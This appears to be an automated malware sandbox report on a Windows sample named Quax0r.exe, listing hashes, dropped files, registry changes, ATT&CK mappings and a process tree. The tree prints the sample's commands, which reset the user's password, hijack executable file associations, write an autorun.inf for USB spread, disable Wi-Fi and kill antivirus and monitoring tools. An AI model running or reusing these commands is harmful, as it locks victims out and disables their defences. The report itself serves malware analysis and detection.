cd1bb0b84729b272e28a48cdfc22ef1f2577e4a1779a9fe871e54cf71707ded8

General

Target

Quax0r.exe
Size

16KB
MD5

779b96f25a5c23fb88062503290e69ce
SHA1

1d3b85c38418d296ced87fb7155e40aad8cb0773
SHA256

cd1bb0b84729b272e28a48cdfc22ef1f2577e4a1779a9fe871e54cf71707ded8
SHA512

7ac94fb7d832302f0aba124f41e168d00e1b3567ff88b7938c25cfb4dd72539e80b56862abf65be99f800d2dec034dbab56be3d5021175a314beee65def9ce3a

Score

7^/10

spyware stealer

Malware Config

Signatures

Drops startup file 1 IoCs

Processes:

Quax0r.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini Quax0r.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	Quax0r.exe

Drops desktop.ini file(s) 30 IoCs

Processes:

Quax0r.exe

description	ioc	process
File created	C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Desktop.ini	Quax0r.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini	Quax0r.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	Quax0r.exe
File created	C:\Users\Admin\Favorites\Links for United States\desktop.ini	Quax0r.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I7JGZPUA\desktop.ini	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI	Quax0r.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini	Quax0r.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini	Quax0r.exe
File created	C:\Users\Admin\Favorites\desktop.ini	Quax0r.exe
File created	C:\Users\Admin\Favorites\Links\desktop.ini	Quax0r.exe
File created	C:\Users\Admin\Music\desktop.ini	Quax0r.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Quax0r.exe
File created	C:\Program Files (x86)\desktop.ini	Quax0r.exe
File created	C:\Users\Admin\Videos\desktop.ini	Quax0r.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2HTZSS82\desktop.ini	Quax0r.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini	Quax0r.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini	Quax0r.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Quax0r.exe
File created	C:\Users\Admin\Desktop\desktop.ini	Quax0r.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5\desktop.ini	Quax0r.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini	Quax0r.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\N4DR1BTE\desktop.ini	Quax0r.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini	Quax0r.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini	Quax0r.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	Quax0r.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini	Quax0r.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini	Quax0r.exe
File created	C:\Users\Admin\Pictures\desktop.ini	Quax0r.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	Quax0r.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D396AG1W\desktop.ini	Quax0r.exe

Drops autorun.inf file 1 TTPs
Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media
T1091

Drops file in Program Files directory 64 IoCs

Processes:

Quax0r.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Desert\TAB_ON.GIF	Quax0r.exe
File created	C:\Program Files (x86)\Windows Media Player\es-ES\WMPMediaSharing.dll.mui	Quax0r.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\FDFFile_8.ico	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382925.JPG	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Office Classic 2.xml	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\FEZIP.POC	Quax0r.exe
File created	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\fr\System.Data.Entity.Resources.dll	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\IPMS.ICO	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\MEDIA\TYPE.WAV	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0292278.WMF	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18196_.WMF	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\TexturedBlue.css	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\SUBMIT.JS	Quax0r.exe
File created	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\PresentationCore.dll	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107026.WMF	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\AUDIOSEARCHLTS.DLL	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\Style\GostTitle.XSL	Quax0r.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00669_.WMF	Quax0r.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\slideShow.html	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00169_.GIF	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18243_.WMF	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Oasis\HEADER.GIF	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL020.XML	Quax0r.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\8.png	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Common Files\Adobe AIR\Versions\1.0\Adobe AIR Application Installer.exe	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\PROOF\MSWDS_EN.LEX	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\VSTA\Pipeline.v10.0\HostSideAdapters\Microsoft.VisualStudio.Tools.Office.Word.HostAdapter.v10.0.dll	Quax0r.exe
File created	C:\Program Files (x86)\Common Files\microsoft shared\ink\de-DE\InkObj.dll.mui	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD14538_.GIF	Quax0r.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_corner_top_left.png	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SY01462_.WMF	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\WWINTL.DLL.IDX_DLL	Quax0r.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\es-ES\css\flyout.css	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01297_.GIF	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Hardcover.xml	Quax0r.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\fr-FR\js\settings.js	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TR00172_.WMF	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02748G.GIF	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\Blog.dotx	Quax0r.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-full_partly-cloudy.png	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\RIPPLE\THMBNAIL.PNG	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00045_.WMF	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01849_.WMF	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\ACEDAO.DLL	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\IPEDINTL.DLL	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\OIS_COL.HXC	Quax0r.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\it-IT\js\library.js	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\MSOICONS.EXE	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0278702.WMF	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00704_.WMF	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\CLASSIC1.WMF	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\GRPHFLT\JPEGIM32.FLT	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\PROPLUS\SETUP.XML	Quax0r.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Onix32.dll	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0293844.WMF	Quax0r.exe
File created	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\fr\UIAutomationClientsideProviders.resources.dll	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\Smart Tag\IMCONTACT.DLL	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00105_.WMF	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00382_.WMF	Quax0r.exe
File created	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\System.Web.Entity.dll	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.71\goopdateres_ja.dll	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0216153.JPG	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\BORDERS\MSART12.BDR	Quax0r.exe

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

1720 taskkill.exe

pid	process
1720	taskkill.exe

Modifies registry class 6 IoCs

Processes:

cmd.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.exe	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.exe\ = "RozbehOfSatanFile "	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "RozbehOfSatanFile "	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "RozbehOfSatanFile"	cmd.exe

Runs net.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

taskkill.exe

description pid process

Token: SeDebugPrivilege 1720 taskkill.exe

description	pid	process
Token: SeDebugPrivilege	1720	taskkill.exe

Suspicious use of WriteProcessMemory 40 IoCs

Processes:

Quax0r.execmd.exenet.execmd.execmd.exe

description	pid	process	target process
PID 1668 wrote to memory of 1328	1668	Quax0r.exe	cmd.exe
PID 1668 wrote to memory of 1328	1668	Quax0r.exe	cmd.exe
PID 1668 wrote to memory of 1328	1668	Quax0r.exe	cmd.exe
PID 1668 wrote to memory of 1328	1668	Quax0r.exe	cmd.exe
PID 1668 wrote to memory of 1752	1668	Quax0r.exe	cmd.exe
PID 1668 wrote to memory of 1752	1668	Quax0r.exe	cmd.exe
PID 1668 wrote to memory of 1752	1668	Quax0r.exe	cmd.exe
PID 1668 wrote to memory of 1752	1668	Quax0r.exe	cmd.exe
PID 1668 wrote to memory of 1172	1668	Quax0r.exe	cmd.exe
PID 1668 wrote to memory of 1172	1668	Quax0r.exe	cmd.exe
PID 1668 wrote to memory of 1172	1668	Quax0r.exe	cmd.exe
PID 1668 wrote to memory of 1172	1668	Quax0r.exe	cmd.exe
PID 1668 wrote to memory of 1444	1668	Quax0r.exe	cmd.exe
PID 1668 wrote to memory of 1444	1668	Quax0r.exe	cmd.exe
PID 1668 wrote to memory of 1444	1668	Quax0r.exe	cmd.exe
PID 1668 wrote to memory of 1444	1668	Quax0r.exe	cmd.exe
PID 1328 wrote to memory of 1684	1328	cmd.exe	net.exe
PID 1328 wrote to memory of 1684	1328	cmd.exe	net.exe
PID 1328 wrote to memory of 1684	1328	cmd.exe	net.exe
PID 1328 wrote to memory of 1684	1328	cmd.exe	net.exe
PID 1668 wrote to memory of 1284	1668	Quax0r.exe	cmd.exe
PID 1668 wrote to memory of 1284	1668	Quax0r.exe	cmd.exe
PID 1668 wrote to memory of 1284	1668	Quax0r.exe	cmd.exe
PID 1668 wrote to memory of 1284	1668	Quax0r.exe	cmd.exe
PID 1684 wrote to memory of 2020	1684	net.exe	net1.exe
PID 1684 wrote to memory of 2020	1684	net.exe	net1.exe
PID 1684 wrote to memory of 2020	1684	net.exe	net1.exe
PID 1684 wrote to memory of 2020	1684	net.exe	net1.exe
PID 1668 wrote to memory of 360	1668	Quax0r.exe	cmd.exe
PID 1668 wrote to memory of 360	1668	Quax0r.exe	cmd.exe
PID 1668 wrote to memory of 360	1668	Quax0r.exe	cmd.exe
PID 1668 wrote to memory of 360	1668	Quax0r.exe	cmd.exe
PID 1284 wrote to memory of 1612	1284	cmd.exe	netsh.exe
PID 1284 wrote to memory of 1612	1284	cmd.exe	netsh.exe
PID 1284 wrote to memory of 1612	1284	cmd.exe	netsh.exe
PID 1284 wrote to memory of 1612	1284	cmd.exe	netsh.exe
PID 360 wrote to memory of 1720	360	cmd.exe	taskkill.exe
PID 360 wrote to memory of 1720	360	cmd.exe	taskkill.exe
PID 360 wrote to memory of 1720	360	cmd.exe	taskkill.exe
PID 360 wrote to memory of 1720	360	cmd.exe	taskkill.exe

C:\Users\Admin\AppData\Local\Temp\Quax0r.exe
"C:\Users\Admin\AppData\Local\Temp\Quax0r.exe"
1⤵
- Drops startup file
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1668

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net users %username% LOCKEDBYROZBEHOFSATAN
2⤵
- Suspicious use of WriteProcessMemory
PID:1328

C:\Windows\SysWOW64\net.exe
net users Admin LOCKEDBYROZBEHOFSATAN
3⤵
- Suspicious use of WriteProcessMemory
PID:1684

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 users Admin LOCKEDBYROZBEHOFSATAN
4⤵
PID:2020

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c assoc .exe=RozbehOfSatanFile && assoc .bat=RozbehOfSatanFile && assoc .cmd=RozbehOfSatanFile
2⤵
- Modifies registry class
PID:1752

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c echo ^[autorun^] > ..\\autorun.inf
2⤵
PID:1172

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c echo open^=WindowsScan^.exe >> ..\\autorun.inf
2⤵
PID:1444

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c netsh Interface Set Interface Wi-Fi 12 disable
2⤵
- Suspicious use of WriteProcessMemory
PID:1284

C:\Windows\SysWOW64\netsh.exe
netsh Interface Set Interface Wi-Fi 12 disable
3⤵
PID:1612

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /im chrome.exe /f && taskkill /im WireShark.exe /f && taskkill /im MSASCUI.exe /f && taskkill /im taskmgr.exe /f && taskkill /im regedit.exe /f && taskkill /im Kaspersky.exe /f && taskkill /im msseces.exe /f && taskkill /im nod32.exe /f && taskkill /im msmpeng.exe /f && taskkill /im navapsvc.exe /f && taskkill /im avkwctl.exe /f && taskkill /im fsav32.exe /f && rundll32 keyboard,disable
2⤵
- Suspicious use of WriteProcessMemory
PID:360

C:\Windows\SysWOW64\taskkill.exe
taskkill /im chrome.exe /f
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1720

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Replication Through Removable Media

1

T1091

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

1

T1081

Discovery

Lateral Movement

Replication Through Removable Media

1

T1091

Collection

Data from Local System

1

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\autorun.inf
Filesize
35B

MD5
261490e22651f58aeb72b82b148f1e02

SHA1
f180054e9592561288db216c9fb156a99ad5830f

SHA256
b12b5eb5be8ef735ed43076e438f438a34adf362a27b187aeba422a4e831b4ba

SHA512
83edf93509d5cc5f275c5877bcf571cf5a8716df603783155bb88338008d409ff5041dfb040253c400750e000e51c9eb8c26cb714cd06186ab9b00fc44b2769c

Download Submit
memory/360-69-0x0000000000000000-mapping.dmp

Download
memory/1172-60-0x0000000000000000-mapping.dmp

Download
memory/1284-66-0x0000000000000000-mapping.dmp

Download
memory/1328-58-0x0000000000000000-mapping.dmp

Download
memory/1444-61-0x0000000000000000-mapping.dmp

Download
memory/1612-71-0x0000000000000000-mapping.dmp

Download
memory/1668-73-0x0000000071040000-0x0000000071D5D000-memory.dmp

Filesize
13.1MB

Download
memory/1668-76-0x0000000070800000-0x0000000070F3E000-memory.dmp

Filesize
7.2MB

Download
memory/1668-64-0x00000000741A0000-0x0000000074980000-memory.dmp

Filesize
7.9MB

Download
memory/1668-79-0x0000000071F00000-0x00000000720D1000-memory.dmp

Filesize
1.8MB

Download
memory/1668-67-0x0000000071F00000-0x00000000720D1000-memory.dmp

Filesize
1.8MB

Download
memory/1668-78-0x0000000072AF0000-0x0000000073E7F000-memory.dmp

Filesize
19.6MB

Download
memory/1668-57-0x00000000720E0000-0x0000000072AF0000-memory.dmp

Filesize
10.1MB

Download
memory/1668-56-0x0000000072AF0000-0x0000000073E7F000-memory.dmp

Filesize
19.6MB

Download
memory/1668-70-0x0000000071D60000-0x0000000071EF4000-memory.dmp

Filesize
1.6MB

Download
memory/1668-55-0x00000000762C1000-0x00000000762C3000-memory.dmp

Filesize
8KB

Download
memory/1668-77-0x00000000706A0000-0x0000000070769000-memory.dmp

Filesize
804KB

Download
memory/1668-54-0x0000000001130000-0x000000000113C000-memory.dmp

Filesize
48KB

Download
memory/1668-74-0x0000000070F40000-0x000000007103C000-memory.dmp

Filesize
1008KB

Download
memory/1684-63-0x0000000000000000-mapping.dmp

Download
memory/1720-72-0x0000000000000000-mapping.dmp

Download
memory/1752-59-0x0000000000000000-mapping.dmp

Download
memory/2020-68-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads